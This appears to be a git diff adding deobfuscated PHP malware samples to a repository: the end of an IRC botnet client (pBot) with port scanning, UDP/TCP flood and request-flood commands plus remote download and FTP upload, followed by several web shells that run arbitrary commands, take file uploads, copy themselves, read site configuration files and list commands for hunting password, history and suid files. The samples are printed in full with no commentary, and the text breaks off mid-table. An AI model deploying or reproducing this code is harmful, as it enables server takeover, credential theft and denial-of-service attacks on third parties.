$this->config[ 'server' ] = base64_encode( $server ); + $this->config[ 'chan' ] = base64_encode( str_replace( "#", "", $channel ) ); + $this->config[ 'key' ] = base64_encode( $key ); + } + else + { + $this->config[ 'server' ] = $server; + $this->config[ 'chan' ] = str_replace( "#", "", $channel ); + $this->config[ 'key' ] = $key; + } + + $this->config[ 'port' ] = $port; + $this->privmsg( $this->get_chan( ), "[ moveserver ] ".$server." => ".$port." => ".$channel." => + $this->send( "QUIT :moveserver command from ".$nick ); + + fclose( $this->conn ); + $this->start(); + } + break; + } + case "whois": + { + $param2 = $mcmd[1]; + + if( !empty( $param2 ) ) + { + //do it + //http://ws.arin.net/whois/?queryinput=127.0.0.1 + $fp = fsockopen( "ws.arin.net", 80, $errno, $errstr, 30 ); + + if( $fp ) + { + $out = "GET /whois/?queryinput=$param2 HTTP/1.1\r\n"; + $out .= "Host: ws.arin.net\r\n"; + $out .= "Keep-Alive: 300\r\n"; + $out .= "Connection: keep-alive\r\n\r\n"; + fwrite( $fp, $out ); + + $whodata = ''; + while(!feof($fp)) + { + /*do nothing*/ + $whodata .= fread( $fp, 1024 ); + } + + $explk = explode( "
", $whodata ); + $explk = explode( "
", $explk[1] ); + $htmldat = strip_tags( $explk[0] ); + + fclose( $fp ); + + $this->privmsg( $this->get_chan( ), "[ whois ] $htmldat" ); + + }else{ + $this->privmsg( $this->get_chan( ), "[ whois ] Error: $errstr" ); + } + } + else + { + $this->privmsg( $this->get_chan( ), "[ whois ] Invalid params, use .whois " ); + } + break; + } + case "upftp": + { + //ftp://user:password@host.com + $pftp = parse_url( $mcmd[1] ); + $file = $mcmd[2]; + $dest = $mcmd[3]; + + if( empty( $pftp[ 'host' ] ) + || empty( $pftp[ 'user' ] ) + || empty( $pftp[ 'pass' ] ) + || empty( $file ) + || empty( $dest ) ) + { + $this->privmsg( $this->get_chan( ), "[ upftp ] URL line invalid!" ); + } + else + { + $conn_id = ftp_connect( $pftp[ 'host' ] ); + $login_result = ftp_login( $conn_id, $pftp[ 'user' ], $pftp[ 'pass' ] ); + + if( ( !$conn_id ) || ( !$login_result ) ) + { + $this->privmsg( $this->get_chan( ), "[ upftp ] FTP connection failed!" ); + } + else + { + $this->privmsg( $this->get_chan( ), "[ upftp ] Connected to ".$pftp[ 'host' ]." for user ".$pftp[ 'user + $upload = ftp_put( $conn_id, $dest, $file, FTP_BINARY ); + if( !$upload ) + { + $this->privmsg( $this->get_chan( ), "[ upftp ] FTP upload faled!" ); + } + else + { + $this->privmsg( $this->get_chan( ), "[ upftp ] FTP upload success!" ); + $this->privmsg( $this->get_chan( ), "[ upftp ] Uploaded '".$file."' to '".$dest."'" ); + } + } + } + break; + } + case "joinchan": + { + $channel = $mcmd[1]; + $key = $mcmd[2]; + $this->privmsg( $this->get_chan( ), "[ joinchan ] ".$channel." => ".$key ); + $this->join( $channel, $key ); + break; + } + case "partchan": + { + $this->privmsg( $this->get_chan( ), "[ partchan ] ".$mcmd[1] ); + $this->send( "PART ".$mcmd[1] ); + } + case "vuln": + { + $server_name = $_SERVER['SERVER_NAME']; + $req_uri = $_SERVER['REQUEST_URI']; + + if( $server_name != "localhost" && $server_name != "127.0.0.1" ) + { + if( strlen( $server_name ) && strlen( $req_uri ) ) + { + $vuln = "http://".$server_name.$req_uri; + $this->privmsg( $this->get_chan( ), "[ getvuln ] ".$vuln ); + } + } + break; + } + case "download": + { + if( count( $mcmd ) > 2 ) + { + if( !$fp = fopen( $mcmd[ 2 ], "w" ) ) + { + $this->privmsg( $this->get_chan( ), "[ download ] Permission denied!" ); + } + else + { + if( !$get = file( $mcmd[ 1 ] ) ) + { + $this->privmsg( $this->get_chan( ), "[ download ] Download failed!" ); + } + else + { + for( $i=0; $i <= count( $get ); $i++ ) + { + fwrite( $fp, $get[ $i ] ); + } + $this->privmsg( $this->get_chan( ),"[ download ] URL [".$mcmd[ 1 ]."] to [".$mcmd[ 2 ]."]"); + } + fclose( $fp ); + } + } + else + { + $this->privmsg( $this->get_chan( ), "[ download ] Invalid Parameters, idiot!" ); + } + break; + } + case "pmsg": + { + $person = $mcmd[1]; + $text = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 ); + $this->privmsg( $this->get_chan( ), "[ pmsg ] ".$person." => ".$text ); + $this->privmsg( $person, $text ); + break; + } + case "pscan": + { + $host = $mcmd[1]; + $beginport = $mcmd[2]; + $endport = $mcmd[3]; + $open_ports = "Open Port List for ".$host.": "; + + for($i = $beginport; $i < $endport; $i++) + { + if( $this->scanport( $host, $i ) ) + { + $open_ports .= "|".$i; + } + } + + $this->privmsg( $this->get_chan( ), $open_ports ); + break; + } + case "software": + { + $this->privmsg( $this->get_chan( ), $_SERVER[ 'SERVER_SOFTWARE' ] ); + break; + } + case "snf": + { + $this->config[ 'nickform' ] = $mcmd[ 1 ]; + $this->privmsg( $this->get_chan( ), "Nickname format set to [ ".$mcmd[ 1 ]." ]" ); + break; + } + case "randnick": + { + $this->set_nick(); + break; + } + case "unauth": + { + $this->remove_auth( $host ); + $this->privmsg( $this->get_chan( ), "[ auth ] Logout [ ".$nick." ]" ); + break; + } + case "urlbomb": + { + $this->urlbomb( $mcmd[ 1 ], $mcmd[ 2 ], $mcmd[ 3 ] ); + break; + } + case "udpflood": + { + if( count( $mcmd ) > 3 ) + { + $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]); + } + break; + } + case "tcpflood": + { + if( count( $mcmd ) > 5 ) + { + $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); + } + break; + } + } + } + } + break; + } + } + } + $old_buf = $this->buf; + } + $this->start(); + } + + function scanport( $host, $port ) + { + if( fsockopen( $host, $port, $e, $s ) ) + { + return 1; + } + return 0; + } + + function urlbomb( $host, $path, $times, $mode = 0 ) + { + if( !isset( $host ) || !isset( $path ) || !isset( $times ) ) + return; + + $this->privmsg( $this->get_chan( ), '[ urlbomb ] started! [ '.$host.'/'.$path.' ]' ); + + $success = 0; + for( $i = 0; $i < $times; $i++ ) + { + $fp = fsockopen( $host, 80, $errno, $errstr, 30 ); + if( $fp ) + { + $out = "GET /".$path." HTTP/1.1\r\n"; + $out .= "Host: ".$host."\r\n"; + $out .= "Keep-Alive: 300\r\n"; + $out .= "Connection: keep-alive\r\n\r\n"; + fwrite( $fp, $out ); + + if( $mode != 0 ) + { + while(!feof($fp)){/*do nothing*/} + } + + fclose( $fp ); + + $success++; + } + } + + $this->privmsg( $this->get_chan( ), '[ urlbomb ] finished! [ '.$host.'/'.$path.' ][ success: '.$success.' ]' ); + } + + function udpflood( $host, $packetsize, $time ) + { + $this->privmsg( $this->get_chan( ),"[ udpflood ] Started [".$host."]" ); + $packet = ""; + for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } + $timei = time(); + $i = 0; + while(time()-$timei < $time) + { + $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); + fwrite($fp,$packet); + fclose($fp); + $i++; + } + $env = $i * $packetsize; + $env = $env / 1048576; + $vel = $env / $time; + $vel = round($vel); + $env = round($env); + $this->privmsg( $this->get_chan( ),"[ udpflood ] $env MB Sent / $vel MB/s "); + } + + function tcpflood($host,$packets,$packetsize,$port,$delay) + { + $this->privmsg( $this->get_chan( ),"[\2TcpFlood Started!\2]"); + $packet = ""; + for($i=0;$i<$packetsize;$i++) + $packet .= chr(mt_rand(1,256)); + + for($i=0;$i<$packets;$i++) + { + if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) + { + $this->privmsg( $this->get_chan( ),"[\2TcpFlood\2]: Error: <$e>"); + return 0; + } + else + { + fwrite($fp,$packet); + fclose($fp); + } + sleep($delay); + } + $this->privmsg( $this->get_chan( ),"[\2TcpFlood Finished!\2]: Config - $packets for $host:$port."); + } + + function send($msg) + { + fwrite($this->conn,"$msg\r\n"); + } + + function join($chan,$key=NULL) + { + $this->send("JOIN $chan $key"); + } + + function privmsg($to,$msg) + { + $this->send("PRIVMSG $to :$msg"); + } + + function notice($to,$msg) + { + $this->send("NOTICE $to :$msg"); + } + + function set_nick() + { + $prefix = "[lnx]"; + if(isset($_SERVER['SERVER_SOFTWARE'])) + { + if( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "apache" ) ) + $prefix = "[A]"; + elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "iis" ) ) + $prefix = "[I]"; + elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "xitami" ) ) + $prefix = "[X]"; + else + $prefix = "[U]"; + } + + if( !$this->is_safe( ) ) + { + $prefix .= "[win32]"; + } + + $random_number = ""; + for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ ) + { + $random_number .= mt_rand( 0, 9 ); + } + + $this->nick = sprintf( $prefix.$this->config[ 'nickform' ], $random_number ); + $this->send("NICK ".$this->nick); + } + + function parse_url_s( $url ) + { + $URLpcs = ( parse_url( $url ) ); + $PathPcs = explode( "/", $URLpcs['path'] ); + $URLpcs['file'] = end( $PathPcs ); + unset( $PathPcs[ key( $PathPcs ) ] ); + $URLpcs['dir'] = implode("/",$PathPcs); + + $fileext = explode( '.', $URLpcs['file'] ); + + if(count($fileext)) + { + $URLpcs['file_ext'] = $fileext[ count( $fileext ) - 1 ]; + } + + return ($URLpcs); + } + } + + $bot = new pBot; + $bot->start(); + +?> \ No newline at end of file diff --git a/Deobfuscated/WebShell_5baf031af52d9d0b7c14b0a737a371e8fbfd62e5.php b/Deobfuscated/WebShell_5baf031af52d9d0b7c14b0a737a371e8fbfd62e5.php new file mode 100644 index 0000000..af757c1 --- /dev/null +++ b/Deobfuscated/WebShell_5baf031af52d9d0b7c14b0a737a371e8fbfd62e5.php @@ -0,0 +1,27 @@ +RevSlideR 2015

"; +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "4,1ON(BuSuX)"; +} +else {$safemode = false; $hsafemode = "OFF(WoKeH)";} +$os = wordwrap(php_uname(),90,"
",1); +$xos = "Safe-mode:[Safe-mode:".$hsafemode."] 7 [OS:".$os."]"; +echo "
".$xos."

"; + +if(isset($_GET['x'])){ +echo "PiNDaH 2015

"; +$source = $_SERVER['SCRIPT_FILENAME']; +$desti =$_SERVER['DOCUMENT_ROOT']."/default.php"; +copy($source, $desti); +} + +echo '
'; +echo '
'; +if( $_POST['_upl'] == "Upload" ) { + if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } + else { echo 'Upload GAGAL !!!

'; } +} +?> \ No newline at end of file diff --git a/Deobfuscated/WebShell_71826e9fb350611ac274038abea50c230549f94d.php b/Deobfuscated/WebShell_71826e9fb350611ac274038abea50c230549f94d.php new file mode 100644 index 0000000..5986cf6 --- /dev/null +++ b/Deobfuscated/WebShell_71826e9fb350611ac274038abea50c230549f94d.php @@ -0,0 +1,74 @@ +jalanG
"; +$dataku = "POWERED BY jalanG"; +$dataku2 = "ready fresh tools SHELLS FTP CPANEL RDP MAILER"; +$dataku3 = "Contact Admin YM :ready.buyer"; +echo "".$dataku."
"; +echo "".$dataku2."
"; +echo "".$dataku3."
"; +echo "".$security."
"; +$cur_user="(".get_current_user().")"; +echo "User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."
"; +echo "Uname : ".php_uname()."
"; +function pwd() { +$cwd = getcwd(); +if($u=strrpos($cwd,'/')){ +if($u!=strlen($cwd)-1){ +return $cwd.'/';} +else{return $cwd;}; +} +elseif($u=strrpos($cwd,'\\')){ +if($u!=strlen($cwd)-1){ +return $cwd.'\\';} +else{return $cwd;}; +}; +} +echo '
Command
'; +echo '
Upload File

New name:
'; +if(isset($_POST['submit'])){ +$uploaddir = pwd(); +if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];}; +move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); +if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){ +echo "Upload Failed"; +} else { echo "Upload Success to ".$uploaddir.$name." Succes! "; } +} +if(isset($_POST['command'])){ +$cmd = $_POST['cmd']; +echo "
".shell_exec($cmd)."
"; +} +elseif(isset($_GET['cmd'])){ +$comd = $_GET['cmd']; +echo "
".shell_exec($comd)."
"; +} +else { echo "
".shell_exec('ls -la')."
"; +} + +if(isset($_GET['baca'])){ +$conf = file_get_contents("../../configuration.php"); +echo $conf; +} +?> \ No newline at end of file diff --git a/Deobfuscated/WebShell_a05811ee776c0536a890dba465e501168851df6c.php b/Deobfuscated/WebShell_a05811ee776c0536a890dba465e501168851df6c.php new file mode 100644 index 0000000..82f3f72 --- /dev/null +++ b/Deobfuscated/WebShell_a05811ee776c0536a890dba465e501168851df6c.php @@ -0,0 +1,1322 @@ + "dir", + "Findindex . phpincurrentdir" => "dir / s / w / bindex . php", + "Find * config * . phpincurrentdir" => "dir / s / w / b * config * . php", + "Showactiveconnections" => "netstat - an", + "Showrunningservices" => "netstart", + "Useraccounts" => "netuser", + "Showcomputers" => "netview", + "ARPTable" => "arp - a", + "IPConfiguration" => "ipconfig / all" + ); +else + $aliases = array( + "Listdir" => "ls - lha", + "listfileattributesonaLinuxsecondextendedfilesystem" => "lsattr - va", + "showopenedports" => "netstat - an | grep - ilisten", + "Find" => "", + "findallsuidfiles" => "find / -typef - perm - 04000 - ls", + "findsuidfilesincurrentdir" => "find . -typef - perm - 04000 - ls", + "findallsgidfiles" => "find / -typef - perm - 02000 - ls", + "findsgidfilesincurrentdir" => "find . -typef - perm - 02000 - ls", + "findconfig . inc . phpfiles" => "find / -typef - nameconfig . inc . php", + "findconfig * files" => "find / -typef - name\"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); + function wsoHeader() { + if (empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; + global $color; + echo "" . $_SERVER['HTTP_HOST'] . "- WSO [Black-ID] " . VERSION . " + + +
+
+ + + + + + +
"; + $freeSpace = @diskfreespace($GLOBALS['cwd']); + $totalSpace = @disk_total_space($GLOBALS['cwd']); + $totalSpace = $totalSpace ? $totalSpace : 1; + $release = @php_uname('r'); + $kernel = @php_uname('s'); + $exdblink = 'http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description='; + if (strpos('Linux', $kernel) !== false) $exdblink.= urlencode('Linux Kernel ' . substr($release, 0, 6)); + else $exdblink.= urlencode($kernel . ' ' . substr($release, 0, 3)); + if (!function_exists('posix_getegid')) { + $user = @get_current_user(); + $uid = @getmyuid(); + $gid = @getmygid(); + $group = "?"; + } else { + $uid = @posix_getpwuid(@posix_geteuid()); + $gid = @posix_getgrgid(@posix_getegid()); + $user = $uid['name']; + $uid = $uid['uid']; + $group = $gid['name']; + $gid = $gid['gid']; + } + $cwd_links = ''; + $path = explode("/", $GLOBALS['cwd']); + $n = count($path); + for ($i = 0;$i < $n - 1;$i++) { + $cwd_links.= "" . $path[$i] . "/"; + } + $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); + $opt_charsets = ''; + foreach ($charsets as $item) $opt_charsets.= ''; + $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Mass' => 'Mass', 'Domains' => 'Domain', 'Sql' => 'Sql', 'Safe mode' => 'SafeMode', 'String tools' => 'StringTools', 'Network' => 'Network'); + $m['Self remove'] = 'SelfRemove'; + $menu = ''; + foreach ($m as $k => $v) $menu.= '[' . $k . ']'; + $drives = ""; + if ($GLOBALS['os'] == 'win') { + foreach (range('c', 'z') as $drive) if (is_dir($drive . ':\')) + $drives .= ' < ahref = "#"onclick = "g(\'FilesMan\',\''.$drive.':/\')" > ['.$drive.'] < / a > '; + } + echo ' < tableclass = infocellpadding = 3cellspacing = 0width = 100 % > < tr > < tdwidth = 1 > < span > Uname: < br > User: < br > Php: < br > Hdd: < br > Cwd: + '.($GLOBALS['os'] == 'win'?' < br > Drives: + ':'').' < / span > < / td > '. + ' < td > < nobr > '.substr(@php_uname(), 0, 120).' < ahref = "http://www.google.com/search?q='.urlencode(@php_uname()).'"target = "_blank" > [Google] < / a > < ahref = "'.$exdblink.'"target = _blank > [Exploit - DB] < / a > < / nobr > < br > '.$uid.'('.$user.') < span > Group: < / span > '.$gid.'('.$group.') < br > '.@phpversion().' < span > Safemode: < / span > '.($GLOBALS['safe_mode']?' < fontcolor = red > ON < / font > ':' < fontcolor = #00bb00>OFF
').' [ phpinfo ] Datetime: '.date('Y-m-d H:i:s').'
'.wsoViewSize($totalSpace).' Free: '.wsoViewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)
'.$cwd_links.' '.wsoPermsColor($GLOBALS['cwd']).' [ home ]
'.$drives.''. + '
Server IP:
' . @$_SERVER["SERVER_ADDR"] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
[ Bing ] | [ Zone-H ]
' . '' . $menu . '
'; + } + function wsoFooter() { + $is_writable = is_writable($GLOBALS['cwd']) ? "[ Writeable ]" : "[ Not writable ]"; + echo " +
+ + + + + + + + + + +
Change dir:
Read file:
Make dir:
$is_writable
Make file:
$is_writable
Execute:
+ + + + + Upload file:
$is_writable
"; + } + if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false)) { + function posix_getpwuid($p) { + return false; + } + } + if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false)) { + function posix_getgrgid($p) { + return false; + } + } + function wsoEx($in) { + $out = ''; + if (function_exists('exec')) { + @exec($in, $out); + $out = @join(" +", $out); + } elseif (function_exists('passthru')) { + ob_start(); + @passthru($in); + $out = ob_get_clean(); + } elseif (function_exists('system')) { + ob_start(); + @system($in); + $out = ob_get_clean(); + } elseif (function_exists('shell_exec')) { + $out = shell_exec($in); + } elseif (is_resource($f = @popen($in, "r"))) { + $out = ""; + while (!@feof($f)) $out.= fread($f, 1024); + pclose($f); + } + return $out; + } + function wsoViewSize($s) { + if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824) . ' GB'; + elseif ($s >= 1048576) return sprintf('%1.2f', $s / 1048576) . ' MB'; + elseif ($s >= 1024) return sprintf('%1.2f', $s / 1024) . ' KB'; + else return $s . ' B'; + } + function wsoPerms($p) { + if (($p & 0xC000) == 0xC000) $i = 's'; + elseif (($p & 0xA000) == 0xA000) $i = 'l'; + elseif (($p & 0x8000) == 0x8000) $i = '-'; + elseif (($p & 0x6000) == 0x6000) $i = 'b'; + elseif (($p & 0x4000) == 0x4000) $i = 'd'; + elseif (($p & 0x2000) == 0x2000) $i = 'c'; + elseif (($p & 0x1000) == 0x1000) $i = 'p'; + else $i = 'u'; + $i.= (($p & 0x0100) ? 'r' : '-'); + $i.= (($p & 0x0080) ? 'w' : '-'); + $i.= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-')); + $i.= (($p & 0x0020) ? 'r' : '-'); + $i.= (($p & 0x0010) ? 'w' : '-'); + $i.= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-')); + $i.= (($p & 0x0004) ? 'r' : '-'); + $i.= (($p & 0x0002) ? 'w' : '-'); + $i.= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-')); + return $i; + } + function wsoPermsColor($f) { + if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; + elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; + else return '' . wsoPerms(@fileperms($f)) . ''; + } + if (!function_exists("scandir")) { + function scandir($dir) { + $dh = opendir($dir); + while (false !== ($filename = readdir($dh))) { + $files[] = $filename; + } + return $files; + } + } + function wsoWhich($p) { + $path = wsoEx('which ' . $p); + if (!empty($path)) return $path; + return false; + } + function actionSecInfo() { + wsoHeader(); + echo '

Server security information

'; + function wsoSecParam($n, $v) { + $v = trim($v); + if ($v) { + echo '' . $n . ': '; + if (strpos($v, " +") === false) echo $v . '
'; + else echo '
' . $v . '
'; + } + } + wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); + wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'); + wsoSecParam('Open base dir', @ini_get('open_basedir')); + wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); + wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); + wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no'); + $temp = array(); + if (function_exists('mysql_get_client_info')) $temp[] = "MySql (" . mysql_get_client_info() . ")"; + if (function_exists('mssql_connect')) $temp[] = "MSSQL"; + if (function_exists('pg_connect')) $temp[] = "PostgreSQL"; + if (function_exists('oci_connect')) $temp[] = "Oracle"; + wsoSecParam('Supported databases', implode(', ', $temp)); + echo '
'; + if ($GLOBALS['os'] == 'nix') { + $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); + $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja'); + $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); + wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes [view]" : 'no'); + wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes [view]" : 'no'); + wsoSecParam('OS version', @file_get_contents('/proc/version')); + wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); + if (!$GLOBALS['safe_mode']) { + echo '
'; + $temp = array(); + foreach ($userful as $item) if (wsoWhich($item)) { + $temp[] = $item; + } + wsoSecParam('Userful', implode(', ', $temp)); + $temp = array(); + foreach ($danger as $item) if (wsoWhich($item)) { + $temp[] = $item; + } + wsoSecParam('Danger', implode(', ', $temp)); + $temp = array(); + foreach ($downloaders as $item) if (wsoWhich($item)) { + $temp[] = $item; + } + wsoSecParam('Downloaders', implode(', ', $temp)); + echo '
'; + wsoSecParam('HDD space', wsoEx('df -h')); + wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); + } + } else { + wsoSecParam('OS Version', wsoEx('ver')); + wsoSecParam('Account Settings', wsoEx('net accounts')); + wsoSecParam('User Accounts', wsoEx('net user')); + } + echo '
'; + wsoFooter(); + } + function actionFilesMan() { + wsoHeader(); + echo '

File manager

'; + if (!empty($_POST['p1'])) { + switch ($_POST['p1']) { + case 'uploadFile': + if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; + break; + case 'mkdir': + if (!@mkdir($_POST['p2'])) echo "Can't create new dir"; + break; + case 'delete': + function deleteDir($path) { + $path = (substr($path, -1) == '/') ? $path : $path . '/'; + $dh = opendir($path); + while (($item = readdir($dh)) !== false) { + $item = $path . $item; + if ((basename($item) == "..") || (basename($item) == ".")) continue; + $type = filetype($item); + if ($type == "dir") deleteDir($item); + else @unlink($item); + } + closedir($dh); + rmdir($path); + } + if (is_array(@$_POST['f'])) foreach ($_POST['f'] as $f) { + $f = urldecode($f); + if (is_dir($f)) deleteDir($f); + else @unlink($f); + } + break; + case 'paste': + if ($_SESSION['act'] == 'copy') { + function copy_paste($c, $s, $d) { + if (is_dir($c . $s)) { + mkdir($d . $s); + $h = @opendir($c . $s); + while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) { + copy_paste($c . $s . '/', $f, $d . $s . '/'); + } + } elseif (is_file($c . $s)) { + @copy($c . $s, $d . $s); + } + } + foreach ($_SESSION['f'] as $f) copy_paste($_SESSION['c'], $f, $GLOBALS['cwd']); + } elseif ($_SESSION['act'] == 'move') { + function move_paste($c, $s, $d) { + if (is_dir($c . $s)) { + mkdir($d . $s); + $h = @opendir($c . $s); + while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) { + copy_paste($c . $s . '/', $f, $d . $s . '/'); + } + } elseif (@is_file($c . $s)) { + @copy($c . $s, $d . $s); + } + } + foreach ($_SESSION['f'] as $f) @rename($_SESSION['c'] . $f, $GLOBALS['cwd'] . $f); + } elseif ($_SESSION['act'] == 'zip') { + if (class_exists('ZipArchive')) { + $zip = new ZipArchive(); + if ($zip->open('wso_' . date("Ymd_His") . '.zip', (int)eval('return ZIPARCHIVE::CREATE;'))) { + chdir($_SESSION['c']); + foreach ($_SESSION['f'] as $f) { + if (@is_file($_SESSION['c'] . $f)) $zip->addFile($_SESSION['c'] . $f, $f); + elseif (@is_dir($_SESSION['c'] . $f)) { + $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/')); + foreach ($iterator as $key => $value) { + $zip->addFile(realpath($key), $key); + } + } + } + chdir($GLOBALS['cwd']); + $zip->close(); + } + } + } elseif ($_SESSION['act'] == 'unzip') { + if (class_exists('ZipArchive')) { + $zip = new ZipArchive(); + foreach ($_SESSION['f'] as $f) { + if ($zip->open($_SESSION['c'] . $f)) { + $zip->extractTo($GLOBALS['cwd']); + $zip->close(); + } + } + } + } + unset($_SESSION['f']); + break; + default: + if (!empty($_POST['p1']) && (($_POST['p1'] == 'copy') || ($_POST['p1'] == 'move') || ($_POST['p1'] == 'zip') || ($_POST['p1'] == 'unzip'))) { + $_SESSION['act'] = @$_POST['p1']; + $_SESSION['f'] = @$_POST['f']; + foreach ($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f); + $_SESSION['c'] = @$_POST['c']; + } + break; + } + } + $dirContent = @scandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']); + if ($dirContent === false) { + echo 'Can\'t open this folder!'; + wsoFooter(); + return; + } + global $sort; + $sort = array('name', 1); + if (!empty($_POST['p1'])) { + if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); + } + echo " + +"; + $dirs = $files = array(); + $n = count($dirContent); + for ($i = 0;$i < $n;$i++) { + $ow = @posix_getpwuid(@fileowner($dirContent[$i])); + $gr = @posix_getgrgid(@filegroup($dirContent[$i])); + $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])); + if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); + elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link')); + elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i]) && ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); + } + $GLOBALS['sort'] = $sort; + function wsoCmp($a, $b) { + if ($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1); + else return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1); + } + usort($files, "wsoCmp"); + usort($dirs, "wsoCmp"); + $files = array_merge($dirs, $files); + $l = 0; + foreach ($files as $f) { + echo ''; + $l = $l ? 0 : 1; + } + echo "
NameSizeModifyOwner/GroupPermissionsActions
